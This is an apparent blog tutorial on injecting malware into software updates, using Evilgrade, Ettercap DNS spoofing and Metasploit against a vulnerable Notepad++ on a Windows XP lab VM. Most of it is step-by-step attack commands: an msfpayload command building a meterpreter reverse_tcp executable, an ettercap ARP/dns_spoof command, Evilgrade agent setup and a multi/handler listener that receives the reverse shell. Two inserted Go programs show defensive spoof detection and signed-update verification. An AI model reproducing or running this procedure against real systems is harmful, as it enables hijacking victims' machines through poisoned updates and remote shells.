Information Security, Web, Networks and Systems

Saturday, June 29, 2013

Evilgrade - Ettercap - Metasploit - Malware Injection into Software Updates

In this post I am going to describe how Evilgrade can be used in combination with Ettercap for a remarkable attack. Evilgrade is a free tool shipped with the BackTrack 5 OS, as is Ettercap. It can be used to inject malware into a victim's machine while a software update is being downloaded. This is a form of Man In The Middle attack. While the attack is going on, the victim downloads what appears to be an update for a piece of software on his computer, but what is actually downloaded is malware disguised as a legitimate update. Normally, once a software update has finished downloading, it is executed and updates the software. In this case, it is the malware that was downloaded, and the software executes it once the download completes. Finally the victim's computer is infected.
To carry out this attack, I use the following tools.

Metasploit (msfpayload and multi/handler exploit)
Attacker's computer - BackTrack Virtual Machine ( IP: )
Victim's computer - Windows XP sp2 Virtual Machine ( IP: ; on the same network with Attacker's computer)
Vulnerable Notepad++ installed on victim's machine.

Since all of these are included in BackTrack, I am using BackTrack for this attack. Otherwise you can separately download and install Evilgrade on a Linux machine. You can download the vulnerable Notepad++ version from the link below.

So let's start.

Procedure:

  • Once the victim checks for Notepad++ updates, that request is redirected to a fake web server created by Evilgrade, which hosts the malware. The redirection is done by DNS spoofing with Ettercap.

  • The user then gets a message saying that an update is available, and when he downloads it, the hosted malware is downloaded to his machine and executed.

  • We create this malware using Metasploit's msfpayload. It connects back to the attacker's machine and gives the attacker control of the victim's machine through a Meterpreter session.

  • Once the Meterpreter session is open on the attacker's computer, the attack is complete and post-exploitation can be carried out through the Meterpreter session.

Starting Evilgrade

In BackTrack 5, Evilgrade is located in the folder

     /pentest/exploits/isr-evilgrade/

We can go into that folder and start Evilgrade using the command

     ./evilgrade

Then you will see Evilgrade start.

In Evilgrade there is a set of modules (in this case, 63) for attacking a range of popular software. You can view the list simply by running the show modules command.

Since we are going to attack Notepad++, we use the notepadplus module. To select that module, run the following command. You can see the available options for this module using the show options command.

     configure notepadplus
     show options

You can see that there is an option called "agent". This is simply the malware that we are going to inject. We should create a malware for our particular purpose using Metasploit, and then we can use it as the agent for Evilgrade. Keep this Evilgrade terminal open to one side and let's create the malware next.

Creating Malware

Let's create a malware which connects back to the attacker's computer and opens a Meterpreter session for the attacker.

Note: I am not going to describe how a Meterpreter session can be used to do various things on the victim's computer. You can easily find out on the web what Meterpreter can do.

I am going to use Metasploit's msfpayload to create the malware with the meterpreter/reverse_tcp payload. I create it as a .exe file and save it as /root/a.exe. The following command does this. Open a new terminal and execute it.

msfpayload windows/meterpreter/reverse_tcp LHOST="" LPORT=4444 X > /root/a.exe

LHOST is the IP address of the attacker's (your) BackTrack machine, and LPORT is the port to which the malware should connect back. You can use any other free port for this, but I'll keep the default, 4444.

The malware will then be created as a.exe and stored in the /root/ folder.

Now that we have created the malware, we can use it in Evilgrade for the attack. What we have to do next is redirect the victim's update request to the server hosted by Evilgrade (which is the attacker's BackTrack machine).

Now look at the options in Evilgrade for notepadplus again.

There is an option called VirtualHost, which is "". This is the website which Notepad++ contacts for updates. Using DNS spoofing we redirect requests for "" to our BackTrack machine where Evilgrade runs. We can use Ettercap for this. (I have previously posted how to use Ettercap for DNS spoofing.)

Add an entry for this in the etter.dns file and start DNS spoofing as follows.

Then start the DNS spoof by executing the following command.

   ettercap -T -Q -M arp -P dns_spoof / //

Use your BackTrack machine's IP address in the above command instead of
Then you will see that DNS spoofing is running. Now go to the attacker's machine and let's start the Evilgrade web server.

Go to the terminal in which Evilgrade is open. What we have to do now is start the Evilgrade web server and set the agent to our malware. Execute the following command to set the agent to our malware, /root/a.exe.

     set agent '["/root/a.exe"]'

Note carefully the syntax of the above command.

Then start the Evilgrade web server using the start command in Evilgrade.

Then you should see a web server and a DNS server start and listen for connections.

Final Step - Start a listener in Metasploit

We have now done 95% of the work. Since our malware connects back to our machine from the victim's machine, we need a listener running on our machine for the incoming connection from the malware. For this, we can use the Multi Handler module in Metasploit.

Open another new terminal and start Metasploit.

After Metasploit has started, start the Multi Handler in Metasploit:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

Then the multi handler starts listening for an incoming connection from the malware.

Now we have done all the work.

  • We created the malware.
  • We hosted it using Evilgrade, which is listening for a connection.
  • The DNS spoof attack is running against the victim's machine, directing update requests to our malware-hosting machine.
  • A listener is running on our machine for an incoming connection from the malware.
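The state recapped above is also what a defender on the same network can look for. The following Go program is an added example, not part of the original post or of any of the tools it uses: it scans a constructed resolver log for an external update host that suddenly resolves to a LAN address, and compares two constructed ARP cache snapshots for an entry whose MAC has moved. The log format, host names and addresses are all made up for the example.

```go
package main

import (
	"fmt"
	"net"
	"strings"
)

// Constructed resolver log ("<client> <qname> <answer>"); names and addresses are made up.
var dnsLog = []string{
	"192.168.1.20 update.example.com 203.0.113.10",
	"192.168.1.20 update.example.com 192.168.1.50",
	"192.168.1.21 time.example.net 198.51.100.7",
}

// Constructed ARP cache snapshots (IP -> MAC) taken before and during the attack window.
var arpBefore = map[string]string{"192.168.1.1": "00:11:22:33:44:01", "192.168.1.50": "00:11:22:33:44:50"}
var arpDuring = map[string]string{"192.168.1.1": "00:11:22:33:44:50", "192.168.1.50": "00:11:22:33:44:50"}

// SuspiciousDNSAnswers returns lines where a public host name resolved to an address in
// the local subnet: a download host pointing at a LAN peer is the mark of a local DNS spoofer.
func SuspiciousDNSAnswers(lines []string, localCIDR string) []string {
	_, local, err := net.ParseCIDR(localCIDR)
	if err != nil {
		return nil
	}
	var hits []string
	for _, l := range lines {
		if f := strings.Fields(l); len(f) == 3 {
			if ip := net.ParseIP(f[2]); ip != nil && local.Contains(ip) {
				hits = append(hits, l)
			}
		}
	}
	return hits
}

// ARPChanges reports IPs whose MAC changed between snapshots (e.g. the gateway "moving"
// to another host's MAC), the basic symptom of ARP cache poisoning.
func ARPChanges(before, during map[string]string) []string {
	var findings []string
	for ip, mac := range during {
		if old, ok := before[ip]; ok && old != mac {
			findings = append(findings, fmt.Sprintf("%s: MAC changed %s -> %s", ip, old, mac))
		}
	}
	return findings
}
```

On a real host the inputs would come from the resolver or DNS sensor logs and from periodic dumps of the ARP cache; here both are embedded so the checks run offline.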

Let's see how the attack happens.

Go to the victim's machine. In my case, it is a Windows XP SP2 virtual machine on the same network as the attacking machine.

Start Notepad++ and try to update.

Then you will see something going on in the terminals in which Ettercap and Evilgrade are running.

We can see from Ettercap that the update request is redirected to the malware-hosting BackTrack machine.

You'll also see Evilgrade responding to the update request.

While this is going on, you will see a notification from Notepad++ saying that an update is available and asking whether to download it.

Now click Yes and let Notepad++ download and install the update it says is available.

When you click Yes, you'll see the update being downloaded, and you will then get a message as follows.

Click Yes again and Notepad++ will close. You will notice in Evilgrade that our malware, /root/a.exe, has been downloaded by Notepad++ and executed.

As it executes, it tries to connect back to the attacking machine. Since we are running a listener in Metasploit, it connects to Metasploit and opens a Meterpreter session for you.
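The reason the downloaded file runs at all is that the update client accepts whatever the server returns, without checking who published it. The Go program below is an added example, not code from this post or from Notepad++, of the check an updater needs: a publisher-signed manifest (Ed25519) carrying the installer's SHA-256, verified under a pinned public key before anything is executed. The manifest layout, version strings and installer bytes are constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
)

// Manifest is the publisher-signed description of one update: the updater trusts the
// downloaded bytes only if they match it, and trusts it only under the pinned publisher key.
type Manifest struct {
	Version string
	SHA256  string // hex digest of the installer bytes
}

func (m Manifest) encode() []byte { return []byte(m.Version + "\n" + m.SHA256) }

// Sign produces the detached signature the publisher ships beside the manifest.
func Sign(priv ed25519.PrivateKey, m Manifest) []byte { return ed25519.Sign(priv, m.encode()) }

// VerifyUpdate rejects a download unless the manifest signature checks under the pinned
// public key and the payload hashes to the signed digest. A spoofed update server can swap
// the payload, as in the attack above, but cannot forge the signature, so the swap is caught.
func VerifyUpdate(pub ed25519.PublicKey, m Manifest, sig, payload []byte) error {
	if !ed25519.Verify(pub, m.encode(), sig) {
		return errors.New("manifest signature invalid: not from the pinned publisher")
	}
	sum := sha256.Sum256(payload)
	if hex.EncodeToString(sum[:]) != m.SHA256 {
		return errors.New("payload digest does not match signed manifest")
	}
	return nil
}

// Demo runs the honest, swapped-payload and tampered-manifest cases with a throwaway key pair.
func Demo() (genuineErr, swappedErr, tamperedErr error) {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	genuine := []byte("constructed: genuine installer bytes")
	sum := sha256.Sum256(genuine)
	m := Manifest{Version: "1.0.1", SHA256: hex.EncodeToString(sum[:])} // constructed values
	sig := Sign(priv, m)
	genuineErr = VerifyUpdate(pub, m, sig, genuine)
	swappedErr = VerifyUpdate(pub, m, sig, []byte("constructed: attacker-substituted binary"))
	forged := m
	forged.Version = "1.0.2" // manifest edited without access to the publisher's private key
	tamperedErr = VerifyUpdate(pub, forged, sig, genuine)
	return
}
```

In a real updater the public key is compiled into the client rather than fetched, so a spoofed DNS answer or a poisoned ARP cache changes where the download comes from but not whether it is trusted.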

You have successfully attacked the Windows XP machine!

This post became much longer than I thought. But I honestly hope it will be helpful for you. Please leave a comment below if you have any ideas to share. Thank you.
